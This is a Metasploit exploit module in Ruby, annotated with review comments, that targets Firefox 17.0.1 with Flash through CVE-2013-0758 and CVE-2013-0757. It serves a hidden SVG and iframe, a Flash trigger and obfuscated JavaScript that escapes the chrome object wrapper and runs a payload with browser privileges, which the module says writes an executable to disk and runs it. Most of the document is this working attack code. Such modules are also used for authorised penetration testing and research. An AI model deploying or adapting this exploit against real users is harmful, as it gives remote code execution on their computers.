##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for Firefox 17.x with the Flash plugin installed
# (CVE-2013-0758 / CVE-2013-0757, see 'References'). It serves one HTML page and
# one .swf trigger from the same module URI; the code run in the chrome://
# context comes from the FirefoxPrivilegeEscalation mixin (run_payload).
#
# Defender context: the affected client window is encoded in
# 'BrowserRequirements' below (Firefox 17.*, any Flash version); the vendor
# advisory for the fix is the MFSA 2013-15 URL in 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::EXE
  # include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # autopwn_info({
  #   :ua_name => HttpClients::FF,
  #   :ua_minver => "17.0",
  #   :ua_maxver => "17.0.1",
  #   :javascript => true,
  #   :rank => NormalRanking
  # })

  # Registers module metadata, targets and datastore options.
  #
  # CONTENT is interpolated verbatim into the served HTML <body> (see
  # generate_html); it is not HTML-escaped, so it is treated as raw markup.
  # DEBUG_JS is read by js_debug.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Firefox 17.0.1 Flash Privileged Code Injection',
      'Description' => %q{
        This exploit gains remote code execution on Firefox 17 and 17.0.1, provided
        the user has installed Flash. No memory corruption is used.

        First, a Flash object is cloned into the anonymous content of the SVG
        "use" element in the <body> (CVE-2013-0758). From there, the Flash object
        can navigate a child frame to a URL in the chrome:// scheme.

        Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper
        around the child frame's window reference and inject code into the chrome://
        context. Once we have injection into the chrome execution context, we can write
        the payload to disk, chmod it (if posix), and then execute.

        Note: Flash is used here to trigger the exploit but any Firefox plugin
        with script access should be able to trigger it.
      },
      'License' => MSF_LICENSE,
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch' => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      'Author' =>
        [
          'Marius Mlynski', # discovery & bug report
          'joev',           # metasploit module
          'sinn3r'          # metasploit fu
        ],
      'References' =>
        [
          ['CVE', '2013-0758'], # navigate a frame to a chrome:// URL
          ['CVE', '2013-0757'], # bypass Chrome Object Wrapper to talk to chrome://
          ['OSVDB', '89019'],   # maps to CVE 2013-0757
          ['OSVDB', '89020'],   # maps to CVE 2013-0758
          ['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
          ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
        ],
      'DisclosureDate' => '2013-01-08',
      # Client gating done by BrowserExploitServer: Firefox 17.* with any Flash
      # version reported; :source => 'script' means the check runs in-page.
      'BrowserRequirements' => {
        :source => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver => /17\..*/,
        :flash => /[\d.]+/
      }
    ))

    register_options(
      [
        OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] ),
        OptBool.new('DEBUG_JS', [false, "Display some alert()'s for debugging the payload.", false])
      ], Auxiliary::Timed)

  end

  # BrowserExploitServer callback for each request from a client that passed
  # 'BrowserRequirements'. Only request.uri is inspected: a URI ending in ".swf"
  # gets the Flash trigger, anything else gets the HTML page from generate_html.
  #
  # @param cli the client connection, passed through to send_response*
  # @param request the HTTP request
  # @param info [Hash] client details from BrowserExploitServer (unused here)
  #
  # NOTE(review): `$` anchors at end-of-line rather than end-of-string in Ruby;
  # `\z` would restrict the match to a true ".swf" suffix.
  def on_request_exploit(cli, request, info)
    if request.uri =~ /\.swf$/
      # send Flash .swf for navigating the frame to chrome://
      print_status("Sending .swf trigger.")
      send_response(cli, flash_trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
    else
      # send initial HTML page
      print_status("Target selected: #{target.name}")
      print_status("Sending #{self.name}")
      send_response_html(cli, generate_html(cli, target))
    end
  end

  # @return [String] the contents of the .swf file used to trigger the exploit,
  #   read from the Metasploit data directory on first use and memoized in
  #   @flash_trigger (swf_path itself is recomputed on every call)
  def flash_trigger
    swf_path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0758.swf")
    @flash_trigger ||= File.read(swf_path)
  end

  # @param str [String] text to place inside the alert() call
  # @param quote [String] quote character wrapped around str
  # @return [String] containing javascript that will alert a debug string
  #   if the DEBUG_JS option is set to true, otherwise an empty string
  #
  # NOTE(review): no caller of js_debug is visible in this file.
  def js_debug(str, quote="'")
    if datastore['DEBUG_JS'] then "alert(#{quote}#{str}#{quote})" else '' end
  end

  # Builds the page served on the first request.
  #
  # The vars hash holds every identifier and literal that is interpolated into
  # both the script and the markup, so the two halves stay consistent. The
  # script is passed through js_obfuscate before being embedded, and the
  # payload string from run_payload is embedded JSON-encoded via JSON.unparse.
  # Despite its name, :random_domain is the fixed string 'safe'. The CONTENT
  # datastore value is appended to the <body> unescaped.
  #
  # @param cli the client connection (unused in this body)
  # @param target the selected target (unused in this body)
  # @return [String] HTML that is sent in the first response to the client
  def generate_html(cli, target)
    vars = {
      :symbol_id => 'a',
      :random_domain => 'safe',
      :payload => run_payload, # defined in FirefoxPrivilegeEscalation mixin
      :payload_var => 'c',
      :payload_key => 'k',
      :payload_obj_var => 'payload_obj',
      :interval_var => 'itvl',
      :access_string => 'access',
      :frame_ref => 'frames[0]',
      :frame_name => 'n',
      :loader_path => "#{get_module_uri}.swf",
      :content => self.datastore['CONTENT'] || ''
    }
    # In-page script; note that '#' inside this %Q string is literal text, not a
    # Ruby comment, so all explanation lives here rather than inside it.
    script = js_obfuscate %Q|
      var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
      var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
      function $() {
        document.querySelector('base').href = "http://www.#{vars[:random_domain]}.com/";
      }
      function _() {
        return '#{vars[:frame_name]}';
      }
      var #{vars[:interval_var]} = setInterval(function(){
        try{ #{vars[:frame_ref]}['#{vars[:access_string]}'] }
        catch(e){
          clearInterval(#{vars[:interval_var]});
          var p = Object.getPrototypeOf(#{vars[:frame_ref]});
          var o = {__exposedProps__: {setTimeout: "rw", call: "rw"}};
          Object.prototype.__lookupSetter__("__proto__").call(p, o);
          p.setTimeout.call(#{vars[:frame_ref]}, #{vars[:payload_var]}, 1);
        }
      }, 100);
      document.querySelector('object').data = "#{vars[:loader_path]}";
      document.querySelector('use').setAttributeNS(
        "http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
      );
    |

    # Page markup: an off-screen 1px SVG holding the <object>, the obfuscated
    # script, an off-screen named iframe, and the operator-supplied CONTENT.
    %Q|
      <!doctype html>
      <html>
      <head>
        <base href="chrome://browser/content/">
      </head>
      <body>

      <svg style='position:absolute;top:-500px;left:-500px;width:1px;height:1px'>
        <symbol id="#{vars[:symbol_id]}">
          <foreignObject>
            <object></object>
          </foreignObject>
        </symbol>
        <use />
      </svg>

      <script>
        #{script}
      </script>

      <iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
              name="#{vars[:frame_name]}"></iframe>
      #{vars[:content]}
      </body>
      </html>
    |
  end
end